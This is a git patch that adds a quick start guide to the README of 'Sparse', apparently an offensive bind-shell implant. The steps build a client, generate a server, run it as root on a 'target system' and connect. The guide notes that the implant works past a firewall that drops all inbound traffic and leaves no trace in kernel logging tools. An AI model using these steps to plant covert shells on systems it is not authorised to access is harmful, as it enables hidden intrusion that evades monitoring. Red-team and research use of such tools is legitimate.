From 7a3f8dd80365961dfe6156d4e69cdac82946230e Mon Sep 17 00:00:00 2001 From: Andrew Rioux Date: Tue, 21 Oct 2025 09:51:47 -0400 Subject: [PATCH] docs: add a clearer quick start guide --- README.md | 12 +++++++++++- sparse-05/README.md | 4 +--- 2 files changed, 12 insertions(+), 4 deletions(-) diff --git a/README.md b/README.md index 83379c4..20eee81 100644 --- a/README.md +++ b/README.md @@ -15,4 +15,14 @@ This environment is designed to be developed in with a Nix developer shell, obta ## Bind shell -The most mature implementation of Sparse would be the Sparse version 0.5 bind shell, which has documentation in [its appropriate folder](./sparse-05/README.md) +The most mature implementation of Sparse would be the Sparse version 0.5 bind shell, which has documentation in [its appropriate folder](./sparse-05/README.md). + +### Quick start: + +- Install the Nix package manager on a Linux system: [https://nixos.org/download/] +- Run `nix --experimental-features 'nix-command flakes' build .#sparse-05-client` +- Generate a Linux server with `result/bin/sparse-05-client generate -t linux service-name` +- Copy to and run on a target system as root +- Connect to it with `result/bin/sparse-05-client connect service-name.scon SERVER_IP:54248` +- Set up a firewall to block all inbound connections with `iptables -P INPUT DROP`, `iptables -F INPUT`; sparse should still be able to connect and operate +- Run `iptstate`, `auditbeat`, or `auditd` from another session to see that no IP or UDP traffic is being logged by the kernel diff --git a/sparse-05/README.md b/sparse-05/README.md index e7dfb78..d7b09d1 100644 --- a/sparse-05/README.md +++ b/sparse-05/README.md @@ -31,14 +31,12 @@ Sparse 0.5 weaponizes libpcap to both receive and send packets. It listens at th # Obtaining -Sparse 0.5 is immediately ready to build from source if using the [Nix package manager](https://nixos.org/download) [with flakes enabled](https://nixos.wiki/wiki/Flakes) by running `nix build .#sparse-05-client`. +Sparse 0.5 is immediately ready to build from source if using the [Nix package manager](https://nixos.org/download) ([with flakes enabled](https://nixos.wiki/wiki/Flakes)) by running `nix build .#sparse-05-client`. ## FreeBSD support Building normally will only produce a client that can generate beacons for Linux and Windows, lacking proper FreeBSD support. To build the client with FreeBSD support, create a FreeBSD build environment by running `vagrant up` and compiling a FreeBSD sparse binary by running `sparse-build` or `sparse-build --release`. With the FreeBSD binary built, copy it from `target/x86_64-unknown-freebsd` to `sparse-05/sparse-05-freebsd-server`, and rebuild using Nix -Currently, there are no prebuilt binaries. However, sparse can easily be built if the [Nix package manager](https://nixos.org/download) is installed. Just clone this repository and run `nix build .#sparse-05-client` and the client will be placed in `result/bin`. - # Use Using sparse centers around the client. The client can generate new servers as well as the configuration file necessary to connect to the server, connect to a server for a shell, and verify the connection against a server.